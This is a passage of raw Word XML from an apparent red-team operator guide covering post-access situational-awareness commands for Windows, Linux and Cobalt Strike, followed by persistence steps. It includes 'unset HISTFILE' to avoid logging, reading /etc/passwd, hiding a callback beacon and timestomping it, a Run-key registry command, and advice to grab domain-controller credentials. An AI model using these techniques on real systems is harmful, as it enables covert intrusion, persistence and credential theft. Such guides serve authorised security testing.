    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:ind w:firstLine="720"/>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-n</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Name server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t rvl</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:reverse lookup enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6yi7wq1jppwl" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Situational Awareness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>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Situation awareness(SA) commands should be performed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Before running a tool that has a large system impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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After gaining access to a system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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After returning from an extensive break</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Periodically while operating</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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BB">
      <w:pPr>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It is performed to understand the state of the system locally and on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kgkzg48b45m1" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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ipconfig /all </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:IP address information for each network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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Also contains DNS servers, gateways and other bits of IP related treasures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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C0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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tasklist /v</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Lists all running processes. The addition of /v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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includes Status, User Name (user currently running the process), CPU Time (how long the program has been running), and Window Title. Be sure to have a wide terminal window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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C3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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netstat -anop tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Lists current, listening, and recently expired</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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network connections. The -a flag asks for all connections. -n asks that the IP addresses not be resolved to actual names. -o displays the process identification (PID) number of the program running the connection. -p tcp asks for only TCP links.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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C6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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dir c:\users</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays directories of every user on the box that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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has a local profile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>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C9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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dir /a c:\</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:The age of pagefile.sys will let you know how long </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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it has been since the last true reboot. Also, the existence of Program Files (x86) points to the OS being an x64 architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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CC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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systeminfo</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Gives detailed information about the workstation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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including architecture and patches. Do not run remotely as the action will create a profile on the remote host for the admin that ran the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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CF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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powershell get-hotfix</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Displays patches and fixes that have been </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>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installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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D2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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net use</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays shares available to the user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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D4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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net user &lt;username&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Displays password creation/expiration dates, group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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affiliations, and other details about the user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pxqlxdxbqn93" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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unset HISTFILE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:While not an SA command itself, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run this first </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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A Linux box</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent your actions from being logged.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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DA">
      <w:pPr>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ifconfig -a</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:IP address information for each network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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Also contains DNS servers, gateways and other bits of IP related treasures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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DD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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ip a</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Similar information to ifconfig but slightly more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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reliable at times.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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E0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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netstat -pantu</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:List current, listening, and recently expired</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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network connections. -p displays the program running the connection. -a shows all connections. -n speeds up results by preventing IP addresses from being resolved to a hostname. -t displays tcp connections. -u displays udp connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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E3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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uname -a </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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E5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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w </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays currently logged in users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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last </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Lists logged in sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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E9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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cat etc/passwd</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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EB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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cat etc/group</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays groups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ccfk5p4s2dck" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cobalt Strike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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ps</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Lists all processes, PIDS, and users </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>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running programs on the workstation. Works much like tasklist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:ind w:left="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0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>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F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7rwnz1uxigd3" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>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Persistence allows the attacker to keep a foothold within a workstation or server regardless of whether or not the box has been rebooted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvyfv9we99go" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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Place a callback beacon file in the user’s AppData folder. Be sure to give the file a name that closely matches the files around it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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Run the Timestomp command to ensure the creation date of the file matches the creation date of the files around it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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F7">
      <w:pPr>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sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Timestomp &lt;FileName&gt; &lt;FilewithDesiredDateToBeUsed&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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Run the callback beacon file on the user system before inputting the registry entry to ensure correct operation of the callback.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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Add a runkey to the registry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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FC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "&lt;AppName&gt;" /t REG_SZ /F /D "&lt;C:\Path\To\File\File.exe&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ln04qzcglfwj" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Hints</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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It can be problematic to maintain persistence within the DC. Instead, grab credentials from the DC and then persist in a workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
